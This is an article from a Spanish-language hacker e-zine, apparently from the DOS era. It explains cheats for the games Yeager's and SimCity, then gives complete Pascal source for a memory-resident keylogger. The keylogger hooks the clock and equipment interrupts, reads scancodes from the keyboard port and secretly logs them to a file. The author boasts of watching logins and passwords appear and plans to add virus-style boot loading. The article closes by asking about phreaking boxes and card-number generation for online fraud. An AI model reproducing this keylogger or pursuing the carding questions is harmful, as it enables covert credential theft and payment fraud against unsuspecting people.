SET 39 Call For Papers

¿Eres un hacker? Si deseas pasar a formar parte de la historia del hacking hispano, colabora con la próxima edición de SET 39 enviándonos un artículo. No esperes más, esta es tu oportunidad de demostrar lo que sabes. Ayúdanos a construir una revista de hackers para hackers. SET Staff

Un par de cracks

      2321

Autor: Nigromante
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
o 04. UN PAR DE CRACKS                                                      o
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII


BUENAS..

Me gustar¡a ense€aros como se crackean dos juegos, uno de ellos bastante 
antiguo como es el YEAGERS y  el otro es el SIMCITY.

El YEAGERS es bastante sencillo, utilizando  un sencillo editor de memoria,
residente en memoria, como puede ser el game wizard puedes leer las claves 
de entrada del juego en la memoria ya que estan en ascii y con cualquier 
comando de busqueda. encuentra la pregunta y despues en ascii la respuesta.
Por lo que entrar es bastante sencillo.

Para el SIMCITY utilizo algo obvio,( aunque se necesita la imaginacion para 
descubrirlo) ,para tener el maximo de dinero. Edito hexadecimalmente los 
archivos (que tienen extension sc2) y modifico el par de caracteres 
hexadecimales de la posicion 2A. Utilizando del debug ser¡a as¡:

debug ejemplo.sc2

e 12a                  'ya que el debug carga el archivo
                       'en la posicion 100
                       'ahora puedes modificar 2 pares
.FF .FF                'de caracteres hexadecimales
                       'que es lo que ocupa el dinero 
                       'escribiendo despues de los puntos
                       'pongo FF FF ya que es lo maximo en hexadecimal
n                      'para grabar en el archivo                         
            
FELICIDADES has conseguido 65536 dolares (FFFFh) Conozco un amigo que 
consiguio incluso la direccion para pedir prestamos, yo no me he esforzado 
por conserguirla.
             
             šque como consegu¡ la direccion?

Grab‚ una partida. Despues pase a hexadecimal el dinero que ten¡a
en la partida, y busque con un editor hexadecimal (COMANDANTE NORTON,
PCTOOLS ETC) ese n£mero. logicamente encontre unos cuantos, digamos
5 o 6. Vuelvo a entrar en el juego gasto algo de dinero, y vuelvo
a buscarlo con el editor hexadecimal, ahora solo me queda una direccion
bual . Ya tengo la direccion donde se guarda el dinero.
Esto se puede extrapolar a cualquier juego. he modificado el doom 2 para
tener m s municion de la que se puede tener. etc...

Supongo que todo esto ya lo sab¡ais y si no supongo que os parece obvio.
Por lo que adem s os mando el codigo en PASCAL de un programilla
que lee codigos de teclado , y los graba en disco cuando se carga
el windows, msd ,edit, qbasic etc (šque qu‚ tienen en com£n?, pues utilizan
la interrupcion 11h de verificacion del EQUIPO)
(que maravilloso es el mundo de las redirecciones je,je,je :) )
Utilizo la redireccion 1c (del reloj) para ir leyendo del puerto 60
que es el del teclado y lo voy guardando en la variable de texto
que se guarda en un archivo si se ejecuta la int 11h .(es decir se carga
el windows).

Es la version 2.1 por lo que en posteriores versiones me gustar¡a que se 
cargase en el boot (UTILIZANDO TECNICAS DE VIRUS) (ahora lo tengo que cargar 
en el autoexec.bat para que se carge cada vez) y tambi‚n me gustar¡a que se 
eliminase de memoria al grabar en el archivo. Pero bueno, para lo que me 
interesa funciona , ya me entendeis je,je,je  }:-)

Intent‚ redireccionar la interrupcion 16 que es la del teclado pero
resulta que se me bloquea el ordenador, mis conocimientos sobre el tema
son bastante prehistoricos por ahora, si alguien me quiere decir por
que se bloquea con la int 16h que me escriba un e-mail, aunque creo
saber porqu‚ es.

             
{$M $800,0,0 }
{         Esta es la version 2.1 del capturador de teclas         }
{         utilizado por NIGROMANTE                                }
uses Crt, Dos;
var
  CLKIntVec,EquipoIntVec: Procedure;
  texto:string;
  aux:word;
  {$F+}
  procedure equipo; interrupt;
  var
     f: text;
   begin
                       setIntVec($11,@equipoIntVec);
                       setIntVec($1c,@clkIntVec);
                       {$i-}
                       assign(f,'c:\TEC.TXT');
                       append(F);
                       texto:=texto+'(FIN)';
                       writeln(f,texto);
                       close(f);
                       {$i+}
    inline ($9C);
    equipoIntVec;
   end;

  procedure clock; interrupt;
   var
     temp:string;
   begin
    if aux<>port[$60] then
               begin
                  aux:=port[$60];
                  str(aux,temp);
                  if (aux<100) then texto:=texto+'|'+temp;
               end;
    inline ($9C);
    clkIntVec;
  end;
{$F-}
begin
  aux:=0;
  GetIntVec($1c,@CLKIntVec);
  SetIntVec($1c,Addr(clock));
  GetIntVec($11,@equipoIntVec);
  SetIntVec($11,Addr(equipo));
  Keep(0);
end.

{      nota:     HE UTILIZADO EL COMANDO APPEND POR LO QUE PARA QUE HAGA
                 ALGO TIENE QUE EXISTIR EL ARCHIVO TEC.TXT EN C:\ 
}
{      En el archivo no aparecen palabras sino codigos  de teclado (numeros)
       que el programa recibe del port[$60] ,pero tranquilos aqu¡ est n
       los codigos para que pod is descifrar el archivo, quiz s proximamente
       haga el programa para traducir el archivo, pero la verdad me canta
       ir descifrandolo a pelo y ver como aparecen lentamente logins
       y passwords ante mis hojos.
       los codigos estan ordenados de izquierda a derecha y de arriba a abajo
       del teclado. por lo que para conseguir el codigo de la letra F puedes
       empezar a contar por la letra A , de esta forma:
           A-30   S-31  D-32  F-33      (El codigo del F es 33)

      (esto lo digo para no tener que escribir toda la tabla) 
      (aqu¡ esta la tabla reducida)

{                           CODIGOS  DE TECLADO
                            -------------------
}
{             APRET.        SIN APRET.
              ------        ----------
      1          2             130               ENTER   28-156
      Q         16             144               SPACE   57
      A         30             158
      Z         44             172

     TECLADO NUMRICO
     ----------------
     7       8      9         71    72   73       199   200  201
     4       5      6         75    76   77       203   204  205
     1       2      3         79    80   81       207   208  209
     0                        82                  210

}
             
             

             
Me gustar¡a algo de informacion sobre blue-boxings y phreaking
(u otras cajitas)

šSe pueden utilizar en Espa€a? šsi es as¡ como se utilizan?

Y sobre carding, descubr¡ el algoritmo de generacion de targetas.

šQue posibilidades tiene ese generador? šque verificacion hacen las
compa€ias espa€olas de venta por internet con las targetas de credito?
En sitios como www.centrocom.com puedes comprar articulos poniendo
el nombre que aparece en la tarjeta, la fecha de caducidad y expedicion
y el n£mero šque pasa puedes comprar con una tarjeta solo con esos
datos??
             
šque futuro nos espera, si telefonica nos sigue tocando los
gitos?
             
šque tal va el codigo penal ,en referencia a delitos inform ticos?


                                          Afectuosamente NIGROMANTE....